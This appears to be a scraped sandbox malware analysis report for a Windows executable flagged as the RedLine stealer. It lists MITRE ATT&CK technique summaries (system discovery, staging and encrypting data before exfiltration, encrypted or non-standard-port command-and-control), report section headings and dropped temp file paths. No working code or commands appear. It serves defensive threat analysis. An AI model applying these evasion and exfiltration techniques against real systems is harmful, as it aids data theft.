Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9dOKGgFNL2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9dOKGgFNL2.exe.log

C:\Users\user\AppData\Local\Temp\tmp4513.tmp

C:\Users\user\AppData\Local\Temp\tmp4514.tmp

C:\Users\user\AppData\Local\Temp\tmp4525.tmp

C:\Users\user\AppData\Local\Temp\tmp4526.tmp

C:\Users\user\AppData\Local\Temp\tmp4536.tmp

C:\Users\user\AppData\Local\Temp\tmp4537.tmp

C:\Users\user\AppData\Local\Temp\tmp4548.tmp

C:\Users\user\AppData\Local\Temp\tmp4549.tmp

C:\Users\user\AppData\Local\Temp\tmp455A.tmp

C:\Users\user\AppData\Local\Temp\tmp457A.tmp

C:\Users\user\AppData\Local\Temp\tmp457B.tmp

C:\Users\user\AppData\Local\Temp\tmp7E4F.tmp

C:\Users\user\AppData\Local\Temp\tmp7E5F.tmp

C:\Users\user\AppData\Local\Temp\tmp7E70.tmp

C:\Users\user\AppData\Local\Temp\tmp7E71.tmp

Windows Analysis Report
9dOKGgFNL2.exe

Function 065911FC Relevance: 6.9, Strings: 5, Instructions: 626
COMMON

Function 065994F0 Relevance: 5.6, Strings: 4, Instructions: 562
COMMON